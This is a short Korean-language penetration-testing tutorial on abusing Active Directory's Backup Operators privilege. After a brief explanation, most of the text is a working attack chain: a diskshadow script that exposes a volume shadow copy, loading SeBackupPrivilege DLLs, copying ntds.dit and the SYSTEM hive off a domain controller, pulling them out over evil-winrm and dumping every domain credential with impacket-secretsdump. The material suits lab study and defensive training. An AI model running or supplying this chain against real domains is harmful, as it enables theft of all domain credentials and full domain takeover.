Backup Operators

Backup Operators 그룹은 AD에서 시스템 파일을 백업할 수 있는 그룹입니다. 백업을 위해서는 모든 디렉토리 및 파일에 접근이 가능해야 하기 때문에 제약 없이 대부분의 ACL을 무시합니다.

도메인 컨트롤러의 ntds 파일에는 도메인에 객체들에 대한 자격 증명 등에 관한 민감한 데이터부터 도메인에 대한 대부분의 정보가 들어있습니다. 공격자가 백업 권한을 가지게 되면 ntds 파일을 덤프하여 도메인에 있는 모든 정보를 탈취할 수 있습니다.

Abuse

GitHub - giuliano108/SeBackupPrivilege: Use SE_BACKUP_NAME/SeBackupPrivilege to access objects you shouldn't have access toGitHub

script.txt

set context persistent nowriters                                                                                                                                                 
set metadata C:\\Windows\\Temp\\metedata.cab                                                                                                                                        
set verbose on                                                                                                                                                                   
add volume C: alias privesccopy                                                                                                                                                  
create                                                                                  
expose %privesccopy% x:

파일 복제를 위해 깃허브로부터 라이브러리 2개를 다운받아 윈도우 환경으로 옮깁니다. Backup Operators 권한 악용에 대한 상용 모듈이 현 시점에서는 개발되지 않았기 때문에 실습은 Evil-Winrm 혹은 GUI 환경에서만 가능합니다.

Evil-Winrm의 경우 UNIX 환경이라 위 스크립트를 그대로 옮길 경우 포맷 방식의 차이로 인해 정상 동작하지 않을 수 있어 다음 명령으로 포맷을 변경합니다.

unix2dos script.txt

이제 파워쉘 환경에서 ntds와 system 하이브를 복제 후 크리덴셜을 덤프합니다.

# DLL 파일 로드
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

# VSS를 통해 디스크 복제
diskshadow /s script.txt

# ntds 파일 다운로드
Copy-FileSeBackupPrivilege X:\Windows\ntds\ntds.dit C:\Windows\Temp\ntds.dit
download ntds.dit

# System 파일 다운로드
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
download SYSTEM

# 크리덴셜 복호화
impacket-secretsdump -system system -ntds ntds.dit LOCAL